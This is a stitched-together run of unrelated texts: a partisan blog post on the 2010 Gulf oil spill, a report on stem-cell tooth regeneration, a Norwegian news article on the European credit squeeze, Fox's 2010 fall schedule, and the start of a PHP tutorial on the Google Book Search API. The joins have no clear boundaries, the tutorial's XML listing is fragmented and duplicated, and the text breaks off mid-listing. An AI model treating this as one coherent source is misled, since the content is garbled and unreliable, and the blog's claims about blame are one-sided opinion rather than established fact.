The NWF describes the dead zone as being “ the largest on record in the hemisphere in coastal waters and one of the biggest in the world . ”
During the summer months , it is nearly devoid of wildlife , save for the dead bodies of crabs , shrimp and other marine species that succumb to oxygen depletion in the polluted water .
Animal toxicology experts believe the Gulf dead zone is a man-made monstrosity …
Underwater oil could create new ‘ dead zone ’ in Gulf
Who ’s to blame for the oil spill ?
Dick Cheney ( Thanks , Dick ..)
And in that vein , please do n’t miss this :
Ed Schultz interviews environmental lawyer Mike Papantonio ( who is suing BP concerning on behalf of fisherman and local businesses hurt by the oil spill in 5 states ) .
Mike Papantonio , an environmental lawyer on the Ed Show just now :
An ‘ acoustic switch ’ would have prevented this catastrophe – it ’s a failsafe that shuts the flow of oil off at the source – they cost only about half a million dollars each , and are required in off - shore drilling platforms in most of the world … except for the United States .
This was one of the new deregulations devised by Dick Cheney during his secret meetings with the oil industry at the beginning of Bush ’s first term .
Someone has to hold these people accountable .
REAL accountability this time .
The damage is off the scales .
Then , real experts – people who actually care about the health of our planet and who are n’t owned by the oil industry – need to be brought in and listened to .
The time is now , before it ’s too late ( if it ’s not too late already .. ) .
The corporations do n’t care about anything but the bottom line and their profit margins .
They do n’t care about all the living creatures that will die , all the coastline that will be destroyed , the ‘ dead zones ’ that will increase in size , all the jobs and livelihoods that will lost for years to come ..
They should pay dearly , but they should n’t be in control of the ‘ facts ’ , the reporting on it , and the solutions .
How can we as a planet trust the people who did this in the first place to be responsible to fix the problem in a safe , thorough , and timely fashion ..
It ’s time to get more people involved , people with much more knowledge and expertise , who are n’t owned by the oil companies and big business .
The fragile balance of this planet ’s ecosystem is at risk .
Now .
Remember the EXXON Valdez oil spill .
This is very likely going to be worse .
Much worse .
The Exxon Valdez Disaster : 20 Years Later
Gulf oil now in powerful Loop Current , scientists say
The first oil from the Gulf of Mexico spill has entered an ocean current that could take it to Florida and up the east coast of the US , scientists say .
The European Space Agency said satellite images suggested oil could reach the coral reefs of the Florida Keys within six days .
“ We have visible proof that at least oil from the surface … has reached the current , ” said Dr Bertrand Chapron .
So , President Obama , please , think long and hard before you follow through with opening up offshore drilling ..
Consider MUCH stronger regulations and oversight for existing drilling sites .
Please , put the health and well - being of this planet first .
If we screw this one up too badly , there is n’t another to take it ’s place ..
: : : : : : : : : :
A technique pioneered in the Tissue Engineering and Regenerative Medicine Laboratory of Dr. Jeremy Mao , the Edward V. Zegarelli Professor of Dental Medicine at Columbia University Medical Center , can orchestrate stem cells to migrate to a three - dimensional scaffold infused with growth factor , holding the translational potential to yield an anatomically correct tooth in as soon as nine weeks once implanted .
People who have lost some or all of their adult teeth typically look to dentures , or , more recently , dental implants to improve a toothless appearance that can have a host of unsettling psycho- social ramifications .
Despite being the preferred ( but generally painful and potentially protracted ) treatment for missing teeth nowadays , dental implants can fail and are unable to " remodel " with surrounding jaw bone that undergoes necessary changes throughout a person 's life .
An animal - model study has shown that by homing stem cells to a scaffold made of natural materials and integrated in surrounding tissue , there is no need to use harvested stem cell lines , or create an environment outside of the body ( e.g. , a Petri dish ) where the tooth is grown and then implanted once it has matured .
The tooth instead can be grown " orthotopically , " or in the socket where the tooth will integrate with surrounding tissue in ways that are impossible with hard metals or other materials .
" These findings represent the first report of regeneration of anatomically shaped tooth - like structures in vivo , and by cell homing without cell delivery , " Dr. Mao and his colleagues say in the paper .
" The potency of cell homing is substantiated not only by cell recruitment into scaffold microchannels , but also by the regeneration of periodontal ligaments and newly formed alveolar bone . "
This study is published in the most recent Journal of Dental Research , the top-rated , peer - reviewed scientific journal dedicated to the dissemination of new knowledge and information on all sciences relevant to dentistry , the oral cavity and associated structures in health and disease .
Dental implants usually consist of a cone - shaped titanium screw with a roughened or smooth surface and are placed in the jaw bone .
While implant surgery may be performed as an outpatient procedure , healing times vary widely and successful implantation is a result of multiple visits to different clinicians , including general dentists , oral surgeons , prosthodontists and periodontists .
Implant patients must allow two to six months for healing and if the implant is installed too soon , it is possible that the implant may fail .
The subsequent time to heal , graft and eventually put into place a new implant may take up to 18 months .
The work of Dr. Mao and his laboratory , however , holds manifold promise : a more natural process , faster recovery times and a harnessing of the body 's own potential to re-grow tissue that will not give out and could ultimately last the patient 's lifetime .
" A key consideration in tooth regeneration is finding a cost - effective approach that can translate into therapies for patients who cannot afford or who are n't good candidates for dental implants , " Dr. Mao says .
" Cell - homing - based tooth regeneration may provide a tangible pathway toward clinical translation . "
Dr. Ira B. Lamster , dean of the College of Dental Medicine , stated : " This research provides an example of what is achievable when today 's biology is applied to common clinical problems .
Dr. Mao's research is a look into the future of dental medicine . "
Explore further Reconstructing mandibular defects with bioengineered tooth and bone
GJELDSKRISEN I EUROPA : Kredittmarkedet fryser til
Gjeldskrisen i Europa har rammet kredittmarkedet med full tyngde .
BRÅSTOPP : Dårlige signaler fra kredittmarkedet .
Vis mer
Publisert : Oppdatert : 24 . mai 2010 16:55 , Publisert : 24 . mai 2010 12:38
Stigende rente og mistillit har rammet kredittmarkedet kraftig i mai .
Spesielt den uoversiktlige situasjonen i Europa med flere land som har fått eller vil måtte få kriselån , har gjort at investorene søker seg mot de aller tryggeste statsobligasjonene og holder seg unna mer usikre lån fra bedrifter eller mindre land .
Bråstopp i nye lån
Nyhetsbyrået Bloomberg skriver at nye utstedelser av obligasjoner ( lån ) fra bedrifter går mot sin dårligste måned på ti år og renten investorene krever for å låne ut til usikre låntagere er på det høyeste nivået siden Lehman Brothers gikk konkurs i september 2008 .
Totalt er det utstedt obligasjonslån fra bedrifter for 47 milliarder dollar i mai , mens det i april ble lagt ut obligasjoner for 183 milliarder dollar .
Fallet er det største siden desember 1999 .
- Likviditetskrise
Investorene strømmer til statsobligasjoner fra de sikreste landene i frykt for at myndighetene i Europa , med EU i spissen , ikke klarer å rydde opp i gjeldsproblemene som i størst grad herjer Hellas , Spania , Portugal og Irland .
- Dette er en grunnleggende likviditetskrise , sier kredittsjef William Cunningham i State Street Corp til Bloomberg .
Han mener at situasjonen i kredittmarkedet i verste fall vil ramme hele økonomien i en allerede sårbar situasjon .
Differansen , eller spreaden på fagspråket , mellom renten på bedriftsobligasjoner og statsobligasjoner steg mandag til 188 basispunkter ( 100 basispunkter er 1 prosent ) i snitt , mens årsbunnen ble nådd 21 .
april med en differanse på 142 basispunkter .
En økende differanse tyder på at investorene mener at risikoen i bedriftsmarkedet stiger og derfor krever de også bedre betalt for å låne ut penger .
Sist gang differansen steg raskere var i oktober 2008 i kjølvannet av konkursen til Lehman Brohters .
Bankene krever mer av hverandre
Det er spesielt markedet for de mest usikre obligasjonene som er hardest rammet , skriver Bloomberg .
Disse søppelobligasjonene - eller junk bonds - har opplevd at differansen til statsobligasjoner har steget med 141 basispunkter .
Et annet eksempel på den økende uroen i markedet er renten bankene krever av hvernadre for å låne ut penger på kort sikt .
Renten på tremånederslån ( Libor ) bankene i mellom steg til 0,497 prosent fredag , og det er det høyeste nivået siden 24 .
juli i fjor .
Årsaken til at bankene hever renten overfor hverandre er en stigende uro for kvaliteten til en rekke lån som bankene har i kriserammede land som Hellas og Spania .
Den vedtatte finansreformen i USA trekkes også frem som en forklaring på stigende rente mellom bankene .
- Vi ser at risikoaversjonen stiger og at det skjer på tvers av ulike investeringsklasser .
Det fører til økt motpartsrisiko , og driver opp rentene i intrabankmarkedet , sier rentestrateg Peter Chatwell i Credit Agricole i London til Bloomberg .
Tysk alenegang
Frykten i finansmarkedene skjøt ekstra fart tirsdag da Tyskland overrasket alle med en forbud mot short - handel knyttet til en rekke tyske finansaksjer , statsobligasjoner og kredittforsikring knyttet til disse obligasjonene .
En shorthandel betyr at investorene vedder på at verdien til et verdipapir skal falle .
Tysklands manøver møtte motstand fra andre EU - land som Frankrike og Nederland , og for investorene understreket hendelsen mangelen på politisk koordinering i EU .
- Myndigheter har ulike synspunkter og prioriteringer i ulike land .
Det er nesten umulig at de snakker med én stemme , sier rentesjef Jamie Stuttard i Schroder Investment Management i London til Bloomberg .
Utsetter nye lån
Bloomberg skriver at flere selskaper har utsatt å legge ut nye obligasjoner i det siste fordi investorene krever for høy rente .
Blant dem er bilprodusenten Volkswagen , gruveselskapet Eurasian Natural Resources Group , forsikringsmegleren Towergate Partnership Sales Postponed , Casino Guichard - Perrachon og Aeroports de Paris .
- Hvis selskaper vil hente inn store summer i markedet nå , blir de nødt til betale ekstra , sier forvalter Felix Freund i Union Investment i Frankfurt til Blomberg .
Greetings to the New Season : Fox
The network upfronts roll on , this time with the fine folks at Fox trotting out their new fall schedule and revealing which new series have been selected to accompany those series which have survived .
As of this writing , there are no clips to accompany the descriptions of the new shows , but I ’m led to understand that we ’ll be getting those in due course , so…oh , wait , scratch that : they just arrived !
Well , with that being the case , you can read the descriptions and check out the clips of what Fox has for us for the upcoming season .
Just be sure to let us know what you think about what they ’re offering up !
Oh , and before you ask , we did n’t forget to include a clip for the last series .
They did n’t offer a clip for the last series … but , hell , I do n’t even think they ’ve cast it yet , so at least they ’ve got a good excuse .
MONDAY
8 – 9 PM : HOUSE
9 – 10 PM : LONESTAR : a provocative soap set against the backdrop of big Texas oil , from Chris Keyser and Amy Lippman , the creators of “ Party of Five ” ; Marc Webb , the director of “ ( 500 ) Days of Summer ” ; and creator Kyle Killen .
Robert / Bob Allen ( newcomer James Wolk ) is a charismatic and brilliant schemer who has meticulously constructed two lives in two different parts of Texas .
He ’s juggling two identities and two women in two very different worlds – all under one mountain of lies .
As “ Bob , ” he lives in Houston and is married to Cat ( Adrianne Palicki , “ Friday Night Lights ” ) , the beautiful daughter of Clint ( Jon Voight , 24 , “ Midnight Cowboy ” ) , the patriarch of an ultra- wealthy Texas oil family .
More than 400 miles away in the suburban west Texas town of Midland , he ’s “ Robert , ” living a second life with his sweet , naïve girlfriend , Lindsay ( Eloise Mumford , “ Mercy , ” “ Law & Order : SVU ” ) .
In Midland , he plays the perfect boyfriend while secretly bilking local investors of their savings .
In Houston , he ’s a devoted husband , charming Cat and her family to cement his position in the rich family business he aims to clean out .
Bob has lived both lives successfully for years without arousing any suspicions … so far .
While one brother - in - law , Drew ( Bryce Johnson , “ Popular , ” “ The Mentalist ” ) , admires Bob , his other brother - in - law , Trammell ( Mark Deklin , “ Nip / Tuck , ” “ Desperate Housewives ” ) , is suspicious of his motives .
Bob begins to fear his secret lives may unravel .
With the cons closing in on him , Bob is divided by his love for two women ; his loyalty to his father and mentor , John ( David Keith , “ An Officer and a Gentleman , ” “ The Class ” ) ; and his respect for his father - in - law , Clint .
Now as he tries to hold his two lives together , while fending off angry investors and the suspicions of those around him , Bob puts it all on the line hoping he can beat the odds , leave the schemes behind and keep two separate relationships afloat .
TUESDAY
8 – 9 PM : GLEE
9 – 9:30 PM : RAISING HOPE : a new single - camera family comedy from Emmy Award winner Greg Garcia ( “ My Name Is Earl ” ) that follows the Chance family as they find themselves adding an unexpected new member into their already terribly flawed household .
At 23 years old , Jimmy Chance ( Lucas Neff , “ The Beast ” ) is going nowhere in life .
He skims pools for a living , parties every night and still lives at home with his family , including his Maw Maw ( guest star Academy Award and Emmy Award winner Cloris Leachman ) ; his mother , Virginia ( Martha Plimpton , “ How to Make It in America ” ) ; his father , Burt ( Garret Dillahunt , “ Terminator : The Sarah Connor Chronicles , ” “ Damages ” ) ; and his cousin , Mike ( Skyler Stone , “ The Mentalist , ” “ Dollhouse ” ) .
Jimmy ’s life takes a drastic turn when a chance romantic encounter with Lucy ( guest star Bijou Phillips , “ Choke , ” “ Almost Famous ” ) goes awry once he discovers she is a wanted felon .
Months later , when Jimmy pays a visit to the local prison , he discovers Lucy gave birth to their baby , who he is now charged with raising .
At home with his new daughter , Jimmy ’s family is less than enthusiastic about a new addition to the household .
His parents , who had him when they were 15 , never knew anything about raising a child and have no interest in trying again .
If Jimmy can work up the nerve to ask her out on a date , he might get some help from Sabrina ( Shannon Woodward , “ The Riches , ” “ ER ” ) , a sardonic checkout clerk he met at the supermarket .
Cousin
Mike is only concerned about how the baby is going to affect their social life , and out - of - touch Maw Maw is no help either .
But Jimmy is determined to take care of his baby – whom Virginia thinks they should name Hope .
With very few useful skills but their hearts in the right place , will the Chance family be successful when they step into the unpredictable and immensely challenging world of parenting ?
9:30 – 10 PM : RUNNING WILDE : a romantic comedy from the Emmy Award - winning creator and the star of the critically acclaimed FOX series “ Arrested Development , ” starring Will Arnett ( “ Arrested Development , ” “ 30 Rock ” ) as Steve Wilde , a filthy - rich , immature playboy trying desperately to win ( or buy ) the heart of his childhood sweetheart , Emmy Kadubic ( Keri Russell , “ Waitress , ” “ Felicity ” ) , the über - liberal humanitarian who got away – all told through the perspective of a 12 - year - old girl .
Steve Wilde has never performed a selfless act .
But why should he – he ’s rich !
The son of an oil tycoon , Steve has n’t had to work a day in his life and has always gotten everything he ’s wanted – with one exception : the love of Emmy .
The daughter of a former Wilde housekeeper , Emmy is an earnest do - gooder who has spent her adult life trying to save the world .
And though Emmy is content living with an indigenous tribe in the Amazon rainforest , her 12 - year - old daughter , Puddle ( Stefania Owen , “ The Lovely Bones ” ) , just wants to be a normal kid experiencing her adolescence in a normal place .
And she would speak up except for the fact that she has n’t spoken in years .
When Wilde Oil ’s expansion in the rainforest threatens her adopted tribe , Emmy decides to attend Steve ’s self - thrown “ Humanitarian of the Year ” award ceremony in hopes of convincing him to help her cause … and also maybe because she still has a thing for Steve .
But same - old Steve is unwilling to help because fighting Wilde Oil ( a /k / a Dad ) means putting his meal ticket in jeopardy .
Rather than run the risk of letting Emmy slip away again , Steve pulls out all the stops to win her heart .
To do so , he enlists the only other people in his life who can help : Migo Salazar ( Joe Nuñez , “ Superbad , ” “ Prison Break ” ) , Steve ’s employee / sidekick / errand - boy , and Gertie Stellvertretter ( Jayne Houdyshell , “ Law & Order ” ) , Steve ’s nanny - turned - head - of - security as well as the biggest protector of Steve …and her own job .
Despite having everything he ever wanted , Steve knows he ca n’t buy love and happiness , which falls in sharp contrast to Emmy , who has nothing but love and happiness .
So with Emmy committed to doing good for nothing , and Steve being a good for nothing , will this hopelessly mismatched pair ever be able to reconcile their differences ?
WEDNESDAY
8 – 9 PM : LIE TO ME
9 -10 PM : HELL’S KITCHEN
THURSDAY
8 – 9 PM : BONES
9 -10 PM : FRINGE
FRIDAY
8 – 9 PM : HUMAN TARGET
9 – 10 PM : THE GOOD GUYS
SATURDAY
8 – 9 PM : COPS
9 – 10 PM : AMERICA ’S MOST WANTED
SUNDAY
7 – 8 PM : THE OT ( NFL post - game )
8 – 8:30 PM : THE SIMPSONS
8:30 – 9 PM : THE CLEVELAND SHOW
9 – 9:30 PM : FAMILY GUY
9:30 – 10 PM : AMERICAN DAD
Canceled :
* 24
* Brothers
* Sons of Tucson
* ‘ Til Death
Returning midseason :
* American Idol
* Kitchen Nightmares
New at midseason :
* BOB ’S BURGERS : a new animated series about a man , his family and a burger joint .
A third - generation restaurateur , Bob Belcher ( H. Jon Benjamin , “ Family Guy , ” “ Archer ” ) runs Bob ’s Burgers with the help of his wife and their three kids .
Bob has big ideas about burgers , condiments and sides , but only a few thoughts on customer service and business management .
Despite his greasy counters , lousy location and occasionally spotty service , Bob is convinced his burgers speak for themselves .
Even though business is slow , Bob gets to work with his family .
His wife , Linda Belcher ( John Roberts , “ The Christmas Tree , ” “ Jackie & Debra ” ) , supports Bob ’s dream through thick and thin ( but truth be told , she ’s getting a little sick of the thin ) .
Their eldest daughter , Tina ( Dan Mintz , “ Important Things with Demetri Martin , ” “ The Andy Milonakis Show ” ) , is a 13 - year - old hopeless romantic with minimal social skills .
Middle child Gene ( Eugene Mirman , “ Flight of the Conchords , ” “ Aqua Teen Hunger Force ” ) is an aspiring musician and a prankster who serves up more jokes than burgers .
Their youngest , Louise ( Kristen Schaal , “ Flight of the Conchords , ” “ Modern Family ” ) , is the most enthusiastic about her dad ’s business , but an off - balance sense of humor and her elevated energy level make her somewhat of a liability in the kitchen .
Beyond the restaurant is a city rich with character .
Next door to Bob ’s is It ’s Your Funeral Home and Crematorium ; down the street is Wonder Wharf , the oceanside amusement pier ; and a few blocks away is Wagstaff Middle School , where Bob and Linda ’s kids go to school .
And across the street is Jimmy Pesto ’s Pizzeria , Bob ’s Burgers ’ main competition and the thorn in Bob ’s side .
* MIXED SIGNALS : a new comedy series about three longtime friends and their attempts to reconcile the irreconcilable : to balance their relationships with their need for freedom .
The series reveals how friendships and romances enhance – and further complicate – the lives of men and the women who love them .
Ethan ( Kris Marshall , “ Human Target , ” “ My Family ” ) is the perpetual bachelor .
He loves women , and when he ’s in , he ’s all in – at least for three weeks .
Charming , genuine and hopelessly independent , Ethan is finding out that as he gets older , the pool of women who are willing to take things day by day is rapidly evaporating .
Adam ( Nelson Franklin , “ The Office , ” “ I Love You Man ” ) recently moved in with his girlfriend , Callie ( Alexandra Breckenridge , “ Family Guy ” ) , and is learning how vastly different “ she comes over a lot ” and “ she lives with me ” really are .
Adam is discovering there is n’t much “ me ” time any more , there ’s only “ us ” time .
Mike ( David Denman , “ The Office ” ) is a married lawyer still trying to figure out the male - female dynamic .
He wants nothing more than to be a good family man to his wife , Lisa ( Liza Lapira , “ Dexter , ” “ Dollhouse ” ) , and his infant son , but he ’s also trying to carve out a little space for himself .
Currently that space is in his car , where he watches action movies in 15 - minute chunks while telling his wife he ’s stuck in traffic .
* RIDE -ALONG :
The city of Chicago is a paradox that serves as the setting for a new drama from Shawn Ryan ( “ The Shield , ” “ The Unit ” ) .
During a ride - along , a civilian spends a shift in the passenger seat of a squad car , observing the work day of a police officer .
But in this series , the audience is the passenger , taking an unpredictable ride through the streets of Chicago and navigating crime and corruption with the most respected – and notorious – cops in the city .
Jarek Wysocki ( Jason Clarke , “ Public Enemies , ” “ Brotherhood ” ) is a local legend and larger - than - life veteran of the Chicago Police Department .
Like the city of Chicago , Jarek is razor blades and brass knuckles wrapped in politeness and egoless charm – a man who throws away partners the way others throw away tissues .
Teresa Colvin ( Jennifer Beals , “ Lie to Me , ” “ The L Word ” ) arrived at the pinnacle of the Chicago Police Department in a short period of time .
She ’s determined to implement changes before the mud that is Chicago politics clogs her office .
As a result of Teresa ’s difficult choices , she has made some powerful enemies along the way , including two street gangs , the police officers ’ union and a city alderman who proves to be a dangerous adversary .
Jarek ’s new partner , Caleb Evers ( Matt Lauria , “ Friday Night Lights ” ) , is a smart and observant young detective who desperately wants to prove himself .
He is savvier and more observant than most people give him credit for , and just might make the perfect yin to Jarek ’s yang .
Also in Jarek ’s charge is his niece , Vonda Wysocki ( Devin Kelley , “ Tease ” ) , a rookie beat cop whose father , Jarek ’s brother , was killed in the line of duty when she was young .
Jarek keeps close tabs on her and is less than thrilled to discover she ’s falling for her partner , Isaac Joiner ( Todd Williams , “ In Plain Sight , ” “ CSI ” ) , a charismatic cop who takes unnecessary risks on the job that land him and Vonda in some dangerous situations .
Alderman Ronin Gibbons ( Delroy Lindo , “ Kidnapped ” ) is a building - magnate - turned - politician who has ruled his ward with a velvet glove for three decades .
Jarek and Teresa are convinced Gibbons and his cohorts , including Liam Hennessey ( Billy Lush , “ The Black Donnellys ” ) , an Irish tough guy in Gibbons ’ construction empire , are dirty to the core , but they ’ve never had the evidence to prove it .
When a murder investigation leads them to Gibbons , they are determined to bring him to justice and clean up Chicago – if that ’s even possible .
* TERRA NOVA : an epic family adventure 85 million years in the making , from executive producers Steven Spielberg , Peter Chernin , Brannon Braga ( 24 , “ Star Trek : Enterprise ” ) and David Fury ( “ Lost , ” “ Buffy the Vampire Slayer ” ) .
“ Terra Nova ” follows an ordinary family embarking on an incredible journey back in time to prehistoric Earth as a small part of a massive experiment to save the human race .
In the year 2149 the world is dying .
The planet is overdeveloped , overcrowded and overpolluted .
With the majority of plant and animal life extinct , devotion to science has brought mankind to the brink of destruction , but has also provided its only hope for salvation .
Knowing there is no way to reverse the damage to the planet , a coalition of scientists has managed to open up a fracture in the space - time continuum , creating a portal to prehistoric Earth .
This doorway leads to an amazing world , one that allows for a last - ditch effort to save the human race … possibly changing the future by correcting the mistakes of the past .
The series centers on the Shannon family as they join the tenth pilgrimage of settlers to Terra Nova , the first colony of humans in this second chance for civilization .
Jim Shannon , a devoted father with a checkered past , guides his family through this new land of limitless beauty , mystery and terror .
Jim ’s wife , Elisabeth Shannon , is a trauma surgeon chosen through a global lottery as a new addition to Terra Nova ’s medical team .
Josh Shannon is their son , mourning the girl he left behind , as he ’s torn between two role models – his father and the charismatic Commander Frank Taylor , the leader of the settlement , and the heroic first pioneer through the time portal .
Maddy Shannon , Jim and Elizabeth ’s teen daughter , is as independent and adventurous as her parents , but her distrust of authority soon leads her on a dangerous path .
In addition to blue skies , rolling rivers and lush vegetation , Terra Nova offers new opportunities and fresh beginnings to its recent arrivals , but the Shannons have brought with them a familial secret that may threaten their citizenship in this utopia .
Additionally these adventurers soon discover that this healthy , vibrant world is not as idyllic as it initially appears .
The areas surrounding Terra Nova are filled with dangerous dinosaurs , and other prehistoric threats , as well as external forces that may be intent on destroying this new world before it begins .
But perhaps even more threatening than what lies outside the protective walls is the Shannons ’ realization that something sinister may be happening inside Terra Nova as not everyone on this mission has the same intentions of how best to save mankind .
Integrate Google Book Search into a PHP application
Use PHP to process and integrate data from Google Book Search with a custom Web application
Frequently used acronyms API : Application programming interface
DOM : Document Object Model
HTTP : Hypertext Transfer Protocol
HTML : Hypertext Markup Language
ISBN : International Standard Book Number
REST : Representational state transfer
URL : Uniform Resource Locator
XML : Extensible Markup Language
If you are connected in any way to the publishing industry , or even if you are just an avid reader , chances are that you 'll have heard about Google Books .
It 's Google 's attempt to create the world 's largest searchable digital library , by scanning millions of books and making them available for preview or purchase online .
It 's also one of Google 's most controversial projects , the focus of a class action lawsuit that was only recently settled in November 2009 .
In addition to making for interesting water - cooler conversation , Google Books is also interesting from a developer perspective on account of its Data API .
This API allows developers to read and search the Google Books database for books matching user - specified criteria , and use the results of these searches in other Web applications .
You can access this API , which follows the REST model , through any XML - capable development toolkit .
The API already has client libraries for PHP , Java™ , and other common programming languages .
This article will introduce you to the Google Book Search Data API , showing you how to integrate and use book search results with a custom PHP application .
It includes examples of searching for books by keyword , by language or by author ; retrieving book data ( including ISBN numbers and thumbnail images ) ; and adding reviews and ratings to books that are already in the database .
Come on in , and get started !
Understanding Book Search feeds
Before you start the PHP code , a few words about the Google Book Search Data API are in order .
As with all REST - based services , the API accepts HTTP requests that contain one or more XML - encoded input arguments and returns XML - encoded responses that can be parsed in any XML - aware client .
With the Google Book Search Data API , the response always consists of an Atom feed containing the requested information .
A typical Book Search feed includes more than enough information to build a useful and relevant application .
To see this for yourself , try to access the URL http://books.google.com/books/feeds/volumes?q=php in your favourite Web browser .
This REST method returns a list of books matching the keyword php .
The raw XML response to this method ( which you can view in the source code of the resulting page ) contains detailed information on these books , and might look something like Listing 1 :
Listing 1 : An example Google Book Search feed
<?xml version = ' 1.0 ' encoding = ' UTF - 8 '?>
< feed xmlns= '
http://www.w3.org/2005/Atom' xmlns:openSearch= '
http://a9.com/-/spec/opensearchrss/1.0/'
xmlns:gbs='http://schemas.google.com/books/2008' xmlns:dc='http://purl.org/dc/terms'
xmlns:gd= ' http://schemas.google.com/g/2005'>
< id>
http://www.google.com/books/feeds/volumes</id>
< updated >2009-12-28T06:14:28.000Z</updated > < category scheme= '
http://schemas.google.com/g/2005#kind' term='http://schemas.google.com/books/2008#volume'/>
< title type= ' text '> Search results for php < / title > < link rel= ' alternate ' type= ' text / html ' href=
'
http://www.google.com'/>
< link rel= '
http://schemas.google.com/g/2005#feed' type='application/atom+xml ' href= '
http://www.google.com/books/feeds/volumes'/> < link rel= 'self ' type=' application /atom+xml ' href= '
http://www.google.com/books/feeds/volumes?q=php'/> < link rel= ' next ' type=' application /atom+xml ' href= '
http://www.google.com/books/feeds/volumes?q=php &start-index=11&max-results=10 '/> < author > < name > Google Books Search </ name > < uri>http://www.google.com</uri> </author > < generator version= ' beta '>
Google Book Search data API </ generator > < openSearch:totalResults>277</openSearch:totalResults > < openSearch:startIndex>1</openSearch:startIndex > < openSearch:itemsPerPage>10</openSearch:itemsPerPage > < entry > < id >
http://www.google.com/books/feeds/volumes/tywvv3ULal0C</id>
< updated >2009-12-28T06:14:28.000Z</updated > < category scheme= '
http://schemas.google.com/g/2005#kind' term='http://schemas.google.com/books/2008#volume'/>
< title type= ' text '> Programming PHP </ title > < link rel= '
http://schemas.google.com/books/2008/thumbnail' type='image/x-unknown ' href= '
http://bks8.books.google.com/books?
id=tywvv3ULal0C&printsec=frontcover&img=1&zoom=5 &edge=curl&sig=ACfU3U0WFIZOyvLPjIv7jqlX4XZ7GI4TAg &source=gbs_gdata'/> < link rel= '
http://schemas.google.com/books/2008/info' type=' text / html ' href= '
http://books.google.com/books?id=tywvv3ULal0C&dq=php &ie=ISO-8859-1&source=gbs_gdata'/> < link rel= '
http://schemas.google.com/books/2008/preview' type= ' text / html ' href=
'
http://books.google.com/books?id=tywvv3ULal0C &printsec=frontcover&dq=php&ie=ISO-8859-1&cd=1 &source=gbs_gdata '/> < link rel= '
http://schemas.google.com/books/2008/annotation' type='application/atom+xml ' href= '
http://www.google.com/books/feeds/users/me/volumes'/>
< link rel= ' alternate ' type= ' text / html ' href= '
http://books.google.com/books?
id=tywvv3ULal0C&dq=php&ie=ISO-8859-1'/> < link rel= 'self ' type=' application /atom+xml ' href= '
http://www.google.com/books/feeds/volumes/tywvv3ULal0C'/>
< gbs:embeddability value= '
http://schemas.google.com/books/2008#embeddable'/>
< gbs:openAccess value= '
http://schemas.google.com/books/2008#disabled'/>
< gbs:viewability value= '
http://schemas.google.com/books/2008#view_partial'/>
< dc:creator > Rasmus Lerdorf</ dc:creator > < dc:creator > Kevin Tatroe</ dc:creator > < dc:creator > Peter MacIntyre</dc:creator > < dc:date >2006</dc:date > < dc:description >
With style tips and practical programming advice , this book will help you become not just a PHP programmer , but a " good " PHP programmer .</dc:description > < dc:format>521 pages</dc:format > < dc:format>book</dc:format > < dc:identifier>tywvv3ULal0C</dc:identifier > < dc:identifier >ISBN:0596006810</dc:identifier > < dc:identifier >ISBN:9780596006815</dc:identifier > < dc:publisher > O' Reilly Media , Inc.</dc:publisher > < dc:subject > Computers</dc:subject > < dc:title > Programming PHP </ dc:title > </entry > < entry > ... </ entry > </ feed >
Take a quick glance through this output to familiarize yourself with its main elements :
The Google Book Search Data API responds to a REST request with an Atom feed containing the requested data .
In most cases , the outermost < feed > element contains < link > elements , which contain URLs for the current , next and previous pages of the result set , and < openSearch : > elements , which contain summary statistics for the search .
element contains elements , which contain URLs for the current , next and previous pages of the result set , and elements , which contain summary statistics for the search .
The outermost < feed > element encloses one or more < entry > elements , each representing a book or " volume " matching the search query .
Each < entry > contains further information on the book it represents , including the title , description , publication date , author , and publisher .
Each < entry > also contains < link > elements , which provide URL links to detailed book information , a thumbnail image , a preview ( if available ) , and annotations such as reviews and ratings .
element encloses one or more elements , each representing a book or " volume " matching the search query .
Each contains further information on the book it represents , including the title , description , publication date , author , and publisher .
Each also contains elements , which provide URL links to detailed book information , a thumbnail image , a preview ( if available ) , and annotations such as reviews and ratings .
The < dc : > namespaced elements within each entry bear special mention .
These elements correspond to elements from the Dublin Core Metadata Initiative ( DCMI ) , which provides a set of standard , reusable definitions for simple information markup and access .
As Listing 1 illustrates , these elements enclose information on the title , authors , publisher ) , format , subject , and ISBN identifiers for each book .
Not all Google Book Search Data API functions are publicly accessible in this manner .
While you can access search functions without authentication , you only access other functions that modify data ( including functions to add reviews and labels , or add books to a user 's library ) , if you are an authenticated user who can provide a valid Google Accounts user name and password .
You 'll see examples of both types of functions in this article .
Executing Book Search queries
Now that you know how to access Google Book Search results through the public REST API , look at how to do the same thing from within a PHP application .
One way is , of course , to use PHP 's built - in XML processing extensions ( SimpleXML , DOM , or XMLReader ) to parse the XML feed returned by Google Book Search and extract the relevant fragments of information from it .
However , this is n't very convenient , especially when you deal with large feeds or large volumes of namespaced information .
And so , this article will use a different approach : the Zend Framework 's Zend_Gdata client library , which is designed specifically for developers trying to integrate PHP applications with Google Data APIs .
The Zend_Gdata library can be downloaded either as part of the Zend Framework or as a stand - alone package ( see Related topics for a link ) .
It includes a module specifically for working with the Google Book Search Data API , providing pre-defined classes and methods to simplify data access and authentication .
Not only does this library provide a solid , community - tested codebase for your application , but when you use it , you can focus on core application functions , rather than on the nitty - gritties of navigating XML trees or handling custom namespaces .
Listing 2 illustrates how to use the Zend_Gdata client library to retrieve and parse a feed of book search results using the Google Book Search Data API :
Listing 2 : Retrieving search results using the Zend_Gdata library
<? php // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_Books_VolumeQuery ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ client->setHeaders ( 'X - Forwarded - For ' , $ _SERVER [ ' REMOTE_ADDR ' ] ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // prepare and execute search query $ query = new Zend_Gdata_Books_VolumeQuery ; $ query -> setQuery ( urlencode ( ' robert crais ' ) ) ; $ feed = $ books -> getVolumeFeed ( $ query ) ; } catch ( Exception $ e ) { die ( ' ERROR : ' . $ e->getMessage ( ) ) ; } ?>
<!
DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN " " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd " >
